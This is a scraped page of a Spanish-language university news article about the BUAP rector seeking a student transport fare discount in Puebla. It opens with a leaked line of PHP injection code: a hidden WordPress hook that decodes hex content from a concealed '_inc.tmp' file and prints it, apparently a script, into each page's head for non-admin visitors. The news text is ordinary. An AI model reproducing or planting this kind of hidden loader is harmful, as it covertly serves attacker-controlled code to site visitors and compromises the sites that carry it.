if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Rector de la BUAP buscará descuento para estudiantes en tarifa del trasporte público – La Opinión Universitaria La Opinión Universitaria
Menu

Rector de la BUAP buscará descuento para estudiantes en tarifa del trasporte público

• Comentó que la decisión del aumento debe darse en base a un estudio sustentado
Por Diego Cuautle
Ante el inminente incremento en las tarifas del trasporte público, el rector de la Benemérita Universidad Autónoma de Puebla (BUAP), Alfonso Esparza Ortiz comentó que buscaría una tarifa preferencial por lo que se espera un descuento de un 50 por ciento para estudiantes que utilizan la Red Urbana de Trasporte Articulado (RUTA).
En entrevista tras la inauguración de la edición 32 de la Feria Nacional del Libro (FENALI), dijo que siempre “hemos insistido sobre eso, está vigente el descuento para los muchachos en el RUTA y por supuesto se buscaría que se hiciera extensivo a todo los que utilizan los estudiantes. Un 50 por ciento sería increíble.”
En este sentido, comentó que luego de que el Gobernador del Estado, Miguel Barbosa Huerta afirmó que después del 16 de septiembre se fijará el aumento a la tarifa del transporte público, consideró que se lleve a cabo un estudio socioeconómico para analizar el aumento al pasaje.
Agregó que deberá consultar a toda la población con la finalidad de que el aumento sea acorde a los ingresos de las familias poblanas… “Creo que debe haber un estudio, seguramente. Hay algunos universitarios que han participado, no tengo resultados, ni conocimiento de cuáles han sido las conclusiones, pero si el estudio lo marca, una consulta a toda la población en general”.
“Es importante que en las negociaciones que lleve a cabo el gobierno del Estado se les solicité a los concesionarios la remodelación de las unidades, además de que se instalen videocámaras de vigilancia y botones de alertamiento de pánico con el objetivo de que se brinde un mejor servicio a los usuarios, además de que se sientan seguros al abordarlas”, recomendó.
Finalmente recordó que actualmente se tiene un descuento del 50 por ciento que es aplicado en una tarjeta especial que se les entregó a cada estudiante y que ha sido de apoyo importante.

  • No comments

    Deja una respuesta

    Tweets recientes